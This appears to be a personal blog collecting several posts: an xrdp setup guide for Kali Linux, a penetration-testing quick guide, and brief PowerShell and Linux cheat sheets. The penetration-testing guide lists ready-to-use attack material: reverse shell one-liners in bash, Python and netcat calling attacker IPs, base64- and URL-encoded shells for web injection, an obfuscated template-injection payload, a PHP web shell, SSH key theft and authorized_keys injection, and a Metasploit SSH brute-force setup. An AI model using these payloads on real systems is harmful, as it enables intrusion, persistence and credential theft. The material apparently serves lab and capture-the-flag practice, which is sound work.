Author: Matt
Kali – How to set up RDP into a Kali Linux Box
I am a big fan of VMs, but not such a fan of the tools used to connect to them in most instances.
Hyper-V, vSphere remote console, VMware Player: they all feel clunky, have inconsistent features and lack some of the basics I really enjoy from modern RDP.
Kali does not have this out of the box, so let's see if we can enable it.
Take a fresh Kali install, and let's open a terminal:
apt-get update
apt-get install xrdp
systemctl start xrdp
systemctl start xrdp-sesman
systemctl enable xrdp
systemctl enable xrdp-sesman
Now there are a few configuration changes we need to make.
Only one X session is allowed by default, which means you will get a black screen after connecting if you are also logged in on the machine locally.
It can also be a problem if your session gets disconnected, as there are times when re-connecting to the existing session will fail.
Let's make an edit to the /etc/xrdp/startwm.sh file.
Add these lines before the “test -x /etc/X11/Xsession && exec” line:
unset DBUS_SESSION_BUS_ADDRESS
unset XDG_RUNTIME_DIR
. $HOME/.profile
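As an added example (not part of the original post), a small shell function that makes the startwm.sh edit above idempotently and a second function that checks the lines landed before the Xsession exec line. The file path is passed as an argument; the default Debian/Kali anchor line is assumed.

```shell
# Insert the xrdp session-environment lines before the Xsession exec line.
# Safe to re-run: a second invocation is a no-op.
# Usage: patch_startwm /etc/xrdp/startwm.sh
patch_startwm() {
  file="$1"
  # Already patched? Leave the file alone.
  if grep -q '^unset DBUS_SESSION_BUS_ADDRESS' "$file"; then
    return 0
  fi
  # Refuse to edit a file that lacks the anchor line we insert before,
  # rather than appending the lines somewhere they would never run.
  if ! grep -q '^test -x /etc/X11/Xsession && exec' "$file"; then
    echo "anchor line not found in $file" >&2
    return 1
  fi
  cp "$file" "$file.bak"   # keep the distro default for rollback
  # awk does not interpolate $HOME inside a string, so it is written literally.
  awk '
    /^test -x \/etc\/X11\/Xsession && exec/ && !done {
      print "unset DBUS_SESSION_BUS_ADDRESS"
      print "unset XDG_RUNTIME_DIR"
      print ". $HOME/.profile"
      done = 1
    }
    { print }
  ' "$file.bak" > "$file"
}

# Verify the edit: the unset line must come before the Xsession exec line.
check_startwm() {
  file="$1"
  unset_line=$(grep -n '^unset DBUS_SESSION_BUS_ADDRESS' "$file" | cut -d: -f1)
  exec_line=$(grep -n '^test -x /etc/X11/Xsession && exec' "$file" | cut -d: -f1)
  [ -n "$unset_line" ] && [ -n "$exec_line" ] && [ "$unset_line" -lt "$exec_line" ]
}
```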
At this point, I like to reboot the machine to emulate a fresh session and see what we get:

Beautiful!
Now we have a full RDP session, with copy and paste and a 4k resolution!
Penetration Testing Tool Quick Guide
updated 22/01/2022
Scanning Tools:
Rustscan
Find open ports – similar to nmap but quicker.
Requires Docker to install
rustscan -a **Hostname** -u 2500
Nmap
Find open ports and services
Scan for Services:
nmap **hostname** -v -sV
Run default scripts on found services:
nmap **hostname** -v -sV -sC
Strings
Find all strings in a file
strings **filename**
Binwalk
Find all files embedded in a file
binwalk -e **filename**
Enumeration Tools:
Amass subdomain scanner
amass enum -d **domain**,**anotherdomain**
lse.sh
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
Enum4Linux
Enumerates Linux hosts
enum4linux -a 10.10.11.108
FFUF
#subdomain
ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200
#files
ffuf -u http://pets.devzat.htb/FUZZ -w ~/tools/SecLists/Discovery/Web-Content/raft-small-words.txt -fs 510
PSPY
Resource monitoring without root
https://github.com/DominicBreuker/pspy
GoBuster
Enumerates websites based on a wordlist.
Directories:
gobuster dir -u **hostname** -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard
Subdomains:
gobuster vhost -u **hostname** -w /home/dev/subdomains-top1million-110000.txt -r
PHP Files:
gobuster dir -u **hostname** -w /home/dev/subdomains-top1million-110000.txt -x php
DirSearch
Web enumeration
python3 dirsearch.py -u 10.10.11.104
WFuzz
Subdomain:
wfuzz -w **wordlist** -u http://**HOST**/ --hc 301 -v -c -H "Host:FUZZ.**hostname**"
Pages:
wfuzz -w **wordlist** -u http://**SUBDOMAIN.HOST**/FUZZ -v -c --hc 404,403 --hw 33
Parameters:
wfuzz -u http://10.10.11.135/image.php?FUZZ=/etc/passwd -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt -t 50 --hh 0
Whatweb
Determines the type of a website, such as “WordPress”
whatweb **hostname**
Searchsploit
Searches for known exploits for a given platform and version
searchsploit **platform** **version**
e.g:
searchsploit wordpress 5.8.2
Find files with read/write access
find / -type f -user **user** -perm 600 2>/dev/null
WordPress Scan
Scans wordpress sites
wpscan --url http://**HOSTNAME**/ --api-token **TOKEN** --enumerate p,u --plugins-detection aggressive
Find SETUID files
find / -perm -u=s -type f 2>/dev/null
Command Injection Examples
PHP
<?php system($_GET[cmd]);?>
Reconnaissance tools:
Chisel
Allows you to redirect traffic from a running port or service by running a server on one host and a client on the other.
Server:
git clone https://github.com/jpillora/chisel
cd chisel && CGO_ENABLED=0 go build -ldflags="-s -w"
sudo ./chisel server -p 8000 --reverse
Client:
./chisel client **SERVERIP**:8000 R:**porttoforward**:127.0.0.1:**porttoforward**
Port Forward traffic using SSH
ssh -i **privateKey** -L **portToForward**:127.0.0.1:**portToForward** **user@host**
Netcat
open a specified port and listen:
sudo nc -lvnp **port**
make a connection:
nc **host** **port**
Git Extractor
wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh
Git Dumper
wget https://raw.githubusercontent.com/internetwache/GitTools/master/Dumper/gitdumper.sh
./gitdumper.sh http://pets.devzat.htb/.git/ HTBdevzat
Identify Hashed strings
https://hashes.com/en/tools/hash_identifier
Privilege Escalation
Extract user ssh key
#extract the key (quote the expansion so the key's line breaks are preserved)
echo "$(cat /home/**user**/.ssh/id_rsa)" > /dev/tmp/key
#place it in the client system, use it to make a ssh connection
ssh -i *keyfile* user@hostname.fqdn
Useful File Locations:
Linux
/etc/passwd
/etc/shadow
/var/log/mysql/error.log
Resources:
Exploit DB
https://www.exploit-db.com/
Reverse Shell Guide
https://sentrywhale.com/documentation/reverse-shell
Sub Domain List
https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-110000.txt
Vulners
http://vulners.com
Exploit Tools
Evil-WinRM
Access WinRM from Linux
evil-winrm -i **hostname** -u **user** -p **password**
CrackMapExec
Exploitation tool, run from Linux, that targets a number of protocols.
SMB – check credentials:
crackmapexec smb **hostname** -u **user** -p **password**
winrm – check credentials:
crackmapexec winrm **hostname** -u **user** -p **password**
MetaSploit
init the framework:
sudo msfdb init
start DB:
sudo msfdb start
connect to console:
msfconsole -q
search for exploit:
search **platformname**
get current user:
getuid
execute a remote command:
execute -f cmd.exe -c -i
spawn a listener:
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost <mymachine>
set lport <myport>
run
Shell one Liners:
Serverside Template Injection
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *IP* *PORT* >/tmp/f')|attr('read')()}}
Python3
exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",12234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Bash
bash -c 'bash -i >& /dev/tcp/**IP**/**port** 0>&1'
mkfifo /tmp/lol;nc **IP** **PORT** 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol
Encode to base 64
#encode
echo -n 'bash -i >& /dev/tcp/10.10.14.6/9001 0>&1' | base64
#server (inject into web parameter)
echo -n ***encodedstring*** | base64 -d | bash
URL encoded Bash
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.8/9001+0>%261'
NC
nc **clientip** -e /bin/bash
Web
%26/bin/bash+-c+'bash+-i+>+/dev/tcp/**IP**/**Port**+0>%261'
Stabilizing a shell
Python
python -c 'import pty;pty.spawn("/bin/bash")'
Inject SSH-key to target machine:
On Client:
ssh-keygen -t rsa -b 4096 -C '**user@domain**' -f **outputfile** -P ''
export PUBLIC_KEY=$(cat **outputfile**.pub)
Code Injection:
mkdir -p /home/**targetuser**/.ssh; echo $PUBLIC_KEY >> /home/**targetuser**/.ssh/authorized_keys
CURL encode payload data
curl -i -H "**headers**" '**url**' -G --data-urlencode "**injectionPoint**;**injected commands**"
Privilege Escalation
Install ssh key via symlink
#*fileToWrite* must be named id_rsa.pub or keys
ln -s /root/.ssh/authorized_keys *fileToWriteTo*
Spawn a python webserver in current folder
python3 -m http.server 80
SSH Brute Force
msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts *target*
set username root
set pass_file *wordlist*
set verbose true
set stop_on_success true
run
PowerShell Cheat Sheet
This PowerShell cheat sheet will list for you a number of commands that I often find useful.
Let's get started with some of the simpler ones:
Class Definition in PowerShell:
class MyClass {
    # constructor
    MyClass() {
    }
}
Return from a function PowerShell:
class MyClass {
    # method returns a string variable type
    [string] exampleFunction() {
        $string = "example"
        return $string
    }
}
Get All Files in a Directory:
Get-ChildItem -Path $path
This will return all files in the directory $path.
Loop over files in a directory:
Get-ChildItem -Path $path | ForEach-Object { ** do something ** }
This will ** do something ** to each file in the directory.
Linux Command Cheat Sheet
System Information:
uname -a
This will return some useful information about the specific flavour of the OS and its kernel.
Shutdown / Restart
shutdown -r now
or:
init 6
This will restart the current system
Dump a SQLite database
sqlite3 /path/to/file
.output /path/to/save/output
.dump
.exit